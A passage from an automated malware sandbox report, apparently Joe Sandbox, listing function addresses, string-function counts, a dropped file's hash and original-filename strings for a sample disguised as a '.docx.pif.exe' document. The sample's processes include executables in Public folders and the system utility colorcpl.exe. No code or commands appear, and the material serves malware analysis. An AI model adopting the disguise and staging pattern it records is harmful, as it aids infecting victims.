              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B562C48 | 8_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B577854 | 8_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AC4C | 8_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B568510 | 8_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56B0D8 | 8_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5718D4 | 8_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563F90 | 8_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B565B70 | 8_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B569B50 | 8_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563410 | 8_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B566BE0 | 8_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AFBC | 8_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56E680 | 8_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58EE88 | 8_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B570A6C | 8_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B565240 | 8_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56D250 | 8_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B569E50 | 8_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B567650 | 8_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56372C | 8_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587F00 | 8_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B566EE4 | 8_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B591538 | 8_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B574224 | 8_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B562220 | 8_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AA30 | 8_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B564A30 | 8_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B568DF8 | 8_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56CE10 | 8_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58D9D0 | 8_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5681D4 | 8_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B567D30 | 10_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5737D8 | 10_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56AA54 | 10_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B575554 | 10_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B561884 | 10_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B562C48 | 10_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B577854 | 10_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AC4C | 10_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B568510 | 10_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56B0D8 | 10_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5718D4 | 10_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563F90 | 10_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B565B70 | 10_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B569B50 | 10_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563410 | 10_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B566BE0 | 10_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AFBC | 10_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56E680 | 10_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58EE88 | 10_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B570A6C | 10_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B565240 | 10_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56D250 | 10_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B569E50 | 10_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B567650 | 10_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56372C | 10_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B587F00 | 10_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B566EE4 | 10_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B591538 | 10_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B574224 | 10_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B562220 | 10_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AA30 | 10_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B564A30 | 10_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B568DF8 | 10_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56CE10 | 10_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58D9D0 | 10_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5681D4 | 10_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5737D8 | 12_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B570A6C | 12_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56AA54 | 12_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B575554 | 12_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B574224 | 12_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B561884 | 12_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B562C48 | 12_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B577854 | 12_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58AC4C | 12_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B567D30 | 12_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56851012_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56B0D812_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5718D412_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B563F9012_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B565B7012_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B569B5012_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56341012_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B566BE012_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58AFBC12_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56E68012_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58EE8812_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56524012_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56D25012_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B569E5012_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56765012_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56372C12_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B587F0012_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B566EE412_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B59153812_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56222012_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58AA3012_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B564A3012_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B568DF812_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56CE1012_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58D9D012_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5681D412_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5737D814_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B570A6C14_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56AA5414_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57555414_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57422414_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56188414_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B562C4814_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57785414_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AC4C14_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B567D3014_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56851014_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56B0D814_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5718D414_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B563F9014_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B565B7014_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B569B5014_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56341014_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B566BE014_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AFBC14_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56E68014_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58EE8814_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56524014_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56D25014_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B569E5014_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56765014_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56372C14_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B587F0014_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B566EE414_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B59153814_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56222014_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AA3014_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B564A3014_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B568DF814_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56CE1014_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58D9D014_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5681D414_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5737D817_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B570A6C17_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56AA5417_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57555417_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57422417_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56188417_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B562C4817_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57785417_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AC4C17_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B567D3017_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56851017_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56B0D817_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5718D417_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B563F9017_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B565B7017_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B569B5017_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56341017_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B566BE017_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AFBC17_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56E68017_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58EE8817_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56524017_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56D25017_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B569E5017_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56765017_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56372C17_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B587F0017_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B566EE417_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B59153817_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56222017_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AA3017_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B564A3017_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B568DF817_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56CE1017_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58D9D017_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5681D417_2_00007FF64B5681D4
              Source: C:\Users\Public\xkn.exeCode function: 22_2_00007FFAAC8B0EF522_2_00007FFAAC8B0EF5
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0605424_2_00007FF7E0A06054
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0166424_2_00007FF7E0A01664
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0596C24_2_00007FF7E0A0596C
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A072C024_2_00007FF7E0A072C0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A06EC824_2_00007FF7E0A06EC8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A067A024_2_00007FF7E0A067A0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A083D824_2_00007FF7E0A083D8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A06AE824_2_00007FF7E0A06AE8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0405024_2_00007FF7E0A04050
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0431824_2_00007FF7E0A04318
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0512824_2_00007FF7E0A05128
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0989024_2_00007FF7E0A09890
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A07C7C24_2_00007FF7E0A07C7C
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A09C7424_2_00007FF7E0A09C74
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0767024_2_00007FF7E0A07670
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A02D7024_2_00007FF7E0A02D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B74E631_2_045B74E6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE55831_2_045BE558
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B877031_2_045B8770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE0CC31_2_045BE0CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459F0FA31_2_0459F0FA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045D415931_2_045D4159
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B816831_2_045B8168
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045C61F031_2_045C61F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE2FB31_2_045BE2FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045D332B31_2_045D332B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A739D31_2_045A739D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B7D3331_2_045B7D33
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B5E5E31_2_045B5E5E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A6E0E31_2_045A6E0E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BDE9D31_2_045BDE9D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04593FCA31_2_04593FCA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B6FEA31_2_045B6FEA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B78FE31_2_045B78FE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B394631_2_045B3946
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045CD9C931_2_045CD9C9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A7A4631_2_045A7A46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459DB6231_2_0459DB62
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A7BAF31_2_045A7BAF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0642108231_2_06421082
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0646E67831_2_0646E678
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064486F531_2_064486F5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645941F31_2_0645941F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064545F531_2_064545F5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064585AD31_2_064585AD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645F20731_2_0645F207
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0644804C31_2_0644804C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645819531_2_06458195
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06474E0831_2_06474E08
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06458E1731_2_06458E17
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06466E9F31_2_06466E9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06473FDA31_2_06473FDA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645EFAA31_2_0645EFAA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06434C7931_2_06434C79
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06457C9931_2_06457C99
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645ED7B31_2_0645ED7B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0643FDA931_2_0643FDA9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06447ABD31_2_06447ABD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645EB4C31_2_0645EB4C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06456B0D31_2_06456B0D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0644885E31_2_0644885E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0643E81131_2_0643E811
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064589E231_2_064589E2
              Source: Joe Sandbox View, Dropped File: C:\Users\Public\Libraries\drbdmeyP.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
              Source: C:\Users\Public\Libraries\drbdmeyP.pif, Code function: String function: 0040DEF0 appears 38 times
              Source: C:\Users\Public\alpha.exe, Code function: String function: 00007FF64B573448 appears 90 times
              Source: C:\Users\Public\alpha.exe, Code function: String function: 00007FF64B57081C appears 45 times
              Source: C:\Users\Public\alpha.exe, Code function: String function: 00007FF64B57498C appears 50 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 045B4E10 appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 045B4770 appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 06455ABF appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 0645541F appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 04581E65 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 06422B14 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 04582093 appears 50 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 0298480C appears 865 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 02997CC8 appears 49 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 029844AC appears 69 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 02997E14 appears 45 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 029846A4 appears 242 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Code function: String function: 02986650 appears 37 times
              Source: C:\Users\Public\ger.exe, Code function: String function: 00007FF7E0A0D3D0 appears 56 times
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Binary or memory string: OriginalFilename vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
